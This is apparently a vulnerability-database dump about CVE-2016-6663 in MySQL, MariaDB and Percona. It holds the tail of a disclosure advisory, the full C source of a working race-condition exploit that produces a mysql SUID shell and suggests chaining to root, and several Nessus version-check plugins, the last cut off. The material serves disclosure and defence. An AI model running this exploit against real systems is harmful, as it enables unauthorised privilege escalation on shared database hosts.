example be exploited by malicious users in a shared \r\nhosting environment where each user is supposed to have access to only one \r\ndatabase assigned to them. \r\nIt could also be exploited by attackers who have managed to find a vulnerability\r\nin a website and gained access to the target system as a low-privileged user\r\n(such as apache/www-data).\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nMariaDB \r\n\t< 5.5.52\r\n\t< 10.1.18\r\n < 10.0.28\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n\r\n\r\n\r\nWhen checking if your system contains the patches, note that this vulnerability \r\nhas been known under two CVE IDs: \r\n\r\nCVE-2016-6663\r\nCVE-2016-5616\r\n\r\nCVE-2016-6663 is the original CVE that was agreed to be used by all the\r\naffected vendors. \r\nThe issue was however mentioned in Oracle CPU mistakenly under a new CVE of\r\nCVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be \r\nupdated to state that CVE-2016-5616 is equivalent to CVE-2016-6663.\r\n\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nMariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in\r\nadvance which allowed them to produce patches for this vulnerability before\r\ndisclosure.\r\n\r\nUpdate to security releases issued by the vendor.\r\n\r\nAs a temporary mitigation, you can disable symbolic link support in the\r\ndatabase server configuration with the following my.cnf config setting:\r\n\r\nsymbolic-links = 0\r\n\r\nNevertheless, an update to a patched release is recommended.\r\n\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nThis advisory (CVE-2016-6663 / OCVE-2016-5616):\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n\r\nExploit (mysql-privesc-race.c) source code URL:\r\nhttp://legalhackers.com/exploits/mysql-privesc-race.c\r\n\r\nVideo PoC:\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\nAdvisory for CVE-2016-6664 / OCVE-2016-5617:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n\r\n\r\nVendor updates:\r\n\r\nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\r\nhttp://www.mysql.com/\r\n\r\nhttps://mariadb.org/about/\r\nhttps://mariadb.com/kb/en/mdb-5552-rn/\r\nhttps://mariadb.com/kb/en/mdb-10118-rn/\r\nhttps://mariadb.com/kb/en/mdb-10028-rn/\r\n\r\nhttps://www.percona.com/software\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\n\r\nhttp://legalhackers.com\r\n \r\n\r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n01.11.2016 - Advisory released\r\n\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "published": "2016-11-02T00:00:00", "type": "seebug", "title": "MySQL / MariaDB / PerconaDB \u63d0\u6743/\u6761\u4ef6\u7ade\u4e89\u6f0f\u6d1e\uff08CVE-2016-6663\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5616", "CVE-2016-5617", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664"], "modified": "2016-11-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92510", "id": "SSV:92510", "sourceData": "\n \r\n/*\r\n\r\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\r\nmysql-privesc-race.c (ver. 1.0)\r\n\r\nCVE-2016-6663 / OCVE-2016-5616\r\n\r\nDiscovered/Coded by:\r\n\r\nDawid Golunski\r\n\r\ndawid[at]legalhackers.com\r\n@dawid_golunski\r\nhttp://legalhackers.com\r\n\r\n\r\nCompile:\r\ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient\r\n\r\nNote:\r\n* On RedHat-based systems you might need to change /tmp to another public directory\r\n\r\n* For testing purposes only. Do no harm. \r\n\r\nFull advisory URL:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n\r\n*/\r\n\r\n\r\n#include <fcntl.h>\r\n#include <grp.h>\r\n#include <mysql.h>\r\n#include <pwd.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n\r\n\r\n#define EXP_PATH \"/tmp/mysql_privesc_exploit\"\r\n#define EXP_DIRN \"mysql_privesc_exploit\"\r\n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\"\r\n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\"\r\n\r\n#define SUID_SHELL \t EXP_PATH \"/mysql_suid_shell.MYD\"\r\n\r\n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary\r\n\r\nMYSQL *conn;\t\t // DB handles\r\nMYSQL_RES *res;\r\nMYSQL_ROW row;\r\n\r\nunsigned long cnt;\r\n\r\n\r\nvoid intro() {\r\n\r\nprintf( \r\n \"\\033[94m\\n\"\r\n \"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\"\r\n \"mysql-privesc-race.c (ver. 1.0)\\n\\n\"\r\n \"CVE-2016-6663 / OCVE-2016-5616\\n\\n\"\r\n \"For testing purposes only. Do no harm.\\n\\n\"\r\n\t\"Discovered/Coded by:\\n\\n\"\r\n\t\"Dawid Golunski \\n\"\r\n\t\"http://legalhackers.com\"\r\n \"\\033[0m\\n\\n\");\r\n\r\n}\r\n\r\nvoid usage(char *argv0) {\r\n intro();\r\n printf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0);\r\n}\r\n\r\nvoid mysql_cmd(char *sql_cmd, int silent) {\r\n \r\n if (!silent) {\r\n\t printf(\"%s \\n\", sql_cmd);\r\n }\r\n if (mysql_query(conn, sql_cmd)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n res = mysql_store_result(conn);\r\n if (res>0) mysql_free_result(res);\r\n\r\n}\r\n\r\n\r\nint main(int argc,char **argv)\r\n{\r\n\r\n int randomnum = 0;\r\n int io_notified = 0;\r\n int myd_handle;\r\n int wpid;\r\n int is_shell_suid=0;\r\n pid_t pid;\r\n int status;\r\n struct stat st;\r\n /* io notify */\r\n int fd;\r\n int ret;\r\n char buf[4096] __attribute__((aligned(8)));\r\n int num_read;\r\n struct inotify_event *event;\r\n /* credentials */\r\n char *user = argv[1];\r\n char *password = argv[2];\r\n char *db_host = argv[3];\r\n char *database = argv[4];\r\n\r\n\r\n // Disable buffering of stdout\r\n setvbuf(stdout, NULL, _IONBF, 0);\r\n\r\n // Get the params\r\n if (argc!=5) {\r\n\tusage(argv[0]);\r\n\texit(1);\r\n } \r\n intro();\r\n // Show initial privileges\r\n printf(\"\\n[+] Starting the exploit as: \\n\");\r\n system(\"id\");\r\n\r\n // Connect to the database server with provided credentials\r\n printf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host);\r\n conn = mysql_init(NULL);\r\n if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n\r\n // Prepare tmp dir\r\n printf(\"\\n[+] Creating exploit temp directory %s\\n\", \"/tmp/\" EXP_DIRN);\r\n umask(000);\r\n system(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN);\r\n system(\"chmod g+s /tmp/\" EXP_DIRN );\r\n\r\n // Prepare exploit tables :)\r\n printf(\"\\n[+] Creating mysql tables \\n\\n\");\r\n mysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 0);\r\n mysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0);\r\n mysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n mysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n\r\n // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file\r\n // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory\r\n printf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\");\r\n system(\"cp /bin/bash \" SUID_SHELL);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n // Use inotify to get the timing right\r\n fd = inotify_init();\r\n if (fd < 0) {\r\n printf(\"failed to inotify_init\\n\");\r\n return -1;\r\n }\r\n ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);\r\n\r\n\r\n /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */\r\n\r\n printf(\"\\n[+] Entering the race loop... Hang in there...\\n\");\r\n\r\n while ( is_shell_suid != 1 ) {\r\n\r\n cnt++;\r\n\tif ( (cnt % 100) == 0 ) {\r\n\t \tprintf(\"->\");\r\n\t \t//fflush(stdout);\t\r\n\t}\r\n\r\n /* Create empty file , remove if already exists */\r\n unlink(MYSQL_TEMP_FILE);\r\n unlink(MYSQL_TAB_FILE);\r\n \tmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1);\r\n\tmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1);\r\n\r\n\t/* random num if needed */\r\n srand ( time(NULL) );\r\n randomnum = ( rand() % MAX_DELAY );\r\n\r\n // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink\r\n pid = fork();\r\n if (pid < 0) {\r\n fprintf(stderr, \"Fork failed :(\\n\");\r\n }\r\n\r\n /* Child process - executes REPAIR TABLE SQL statement */\r\n if (pid == 0) {\r\n usleep(500);\r\n unlink(MYSQL_TEMP_FILE);\r\n\t mysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1);\r\n // child stops here\r\n exit(0);\r\n }\r\n\r\n /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */\r\n if (pid > 0 ) {\r\n io_notified = 0;\r\n\r\n while (1) {\r\n int processed = 0;\r\n ret = read(fd, buf, sizeof(buf));\r\n if (ret < 0) {\r\n break;\r\n }\r\n while (processed < ret) {\r\n event = (struct inotify_event *)(buf + processed);\r\n if (event->mask & IN_CLOSE) {\r\n if (!strcmp(event->name, \"exploit_table.TMD\")) {\r\n //usleep(randomnum);\r\n\r\n\t\t\t // Set the .MYD permissions to suid+exec before they get copied to the .TMD file \r\n\t\t\t unlink(MYSQL_TAB_FILE);\r\n\t\t\t myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);\r\n\t\t\t close(myd_handle);\r\n\t\t\t chmod(MYSQL_TAB_FILE, 04777);\r\n\r\n\t\t\t // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec\r\n unlink(MYSQL_TEMP_FILE);\r\n symlink(SUID_SHELL, MYSQL_TEMP_FILE);\r\n io_notified=1;\r\n }\r\n }\r\n processed += sizeof(struct inotify_event);\r\n }\r\n if (io_notified) {\r\n break;\r\n }\r\n }\r\n\r\n\r\n waitpid(pid, &status, 0);\r\n }\r\n\r\n\t// Check if SUID bit was set at the end of this attempt\r\n if ( lstat(SUID_SHELL, &st) == 0 ) {\r\n\t if (st.st_mode & S_ISUID) {\r\n\t\tis_shell_suid = 1;\r\n\t }\r\n } \r\n\r\n }\r\n\r\n printf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) !\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n printf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\");\r\n system(SUID_SHELL \" -p -i \");\r\n //system(SUID_SHELL \" -p -c '/bin/bash -i -p'\");\r\n\r\n /* close MySQL connection and exit */\r\n printf(\"\\n[+] Job done. Exiting\\n\\n\");\r\n mysql_close(conn);\r\n return 0;\r\n\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92510", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T04:03:51", "description": "The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.29. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in the\n check_duplicate_key() function due to improper handling\n of error messages. An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n destroy() function in sql/sql_select.cc due to improper\n handling of a specially crafted query. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n date_add_interval() function in sql/sql_time.cc due to\n improper handling of INTERVAL arguments. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. An authenticated, remote attacker can exploit this\n to crash the database.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-13T00:00:00", "title": "MariaDB 10.0.x < 10.0.29 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6664"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_10_0_29.NASL", "href": "https://www.tenable.com/plugins/nessus/96486", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96486);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2016-6664\");\n script_bugtraq_id(93612);\n\n script_name(english:\"MariaDB 10.0.x < 10.0.29 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.29. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in the\n check_duplicate_key() function due to improper handling\n of error messages. An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n destroy() function in sql/sql_select.cc due to improper\n handling of a specially crafted query. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n date_add_interval() function in sql/sql_time.cc due to\n improper handling of INTERVAL arguments. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. An authenticated, remote attacker can exploit this\n to crash the database.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-10029-changelog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 10.0.29 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'10.0.29-MariaDB', min:'10.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:04:05", "description": "The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.54. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n parse_filter_rule() function in sql/rpl_filter.cc\n that is triggered during the clearing of wildcards. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. An authenticated, remote attacker can exploit this\n to crash the database.\n\n - A denial of service vulnerability exists in the\n st_select_lex::is_merged_child_of() function in\n sql/sql_lex.cc due to improper handling of merged views\n or derived tables. An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in sql/item.cc\n due to improper handling of a specially crafted\n subquery. An authenticated, remote attacker can exploit\n this to crash the database.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-13T00:00:00", "title": "MariaDB 5.5.x < 5.5.54 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6664"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_5_5_54.NASL", "href": "https://www.tenable.com/plugins/nessus/96489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96489);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2016-6664\");\n script_bugtraq_id(93612);\n\n script_name(english:\"MariaDB 5.5.x < 5.5.54 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.54. It is, therefore, affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists in\n scripts/mysqld_safe.sh due to improper handling of\n arguments to malloc-lib. A local attacker can exploit\n this, via a symlink attack on error logs, to gain root\n privileges. (CVE-2016-6664)\n\n - A denial of service vulnerability exists in\n sql/item_subselect.cc due to improper handling of\n queries from the select/unit tree. An authenticated,\n remote attacker can exploit this to crash the database.\n\n - A denial of service vulnerability exists in the\n check_well_formed_result() function in sql/item.cc due\n to improper handling of row validation. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n parse_filter_rule() function in sql/rpl_filter.cc\n that is triggered during the clearing of wildcards. An\n authenticated, remote attacker can exploit this to crash\n the database.\n\n - A denial of service vulnerability exists in the\n safe_charset_converter() function in sql/item.cc due to\n improper handling of a specially crafted subselect query\n item. An authenticated, remote attacker can exploit this\n to crash the database.\n\n - A denial of service vulnerability exists in the\n st_select_lex::is_merged_child_of() function in\n sql/sql_lex.cc due to improper handling of merged views\n or derived tables. An authenticated, remote attacker can\n exploit this to crash the database.\n\n - A denial of service vulnerability exists in sql/item.cc\n due to improper handling of a specially crafted\n subquery. An authenticated, remote attacker can exploit\n this to crash the database.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5554-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-5554-changelog/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 5.5.54 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'5.5.54-MariaDB', min:'5.5', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:04:05", "description": "The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.52. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. An authenticated, remote attacker can\n exploit this to cause a denial of service condition.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "MariaDB 5.5.x < 5.5.52 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_5_5_52.NASL", "href": "https://www.tenable.com/plugins/nessus/95633", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95633);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3492\",\n \"CVE-2016-5616\",\n \"CVE-2016-5624\",\n \"CVE-2016-5626\",\n \"CVE-2016-5629\",\n \"CVE-2016-6663\",\n \"CVE-2016-8283\"\n );\n script_bugtraq_id(\n 92911,\n 93614,\n 93635,\n 93638,\n 93650,\n 93668,\n 93737\n );\n\n script_name(english:\"MariaDB 5.5.x < 5.5.52 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 5.5.x prior to\n5.5.52. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. An authenticated, remote attacker can\n exploit this to cause a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5552-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-5552-changelog/\");\n # https://mariadb.com/resources/blog/update-on-security-vulnerabilities-cve-2016-6663-and-cve-2016-6664-related-to-mariadb-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fefde198\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 5.5.52 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 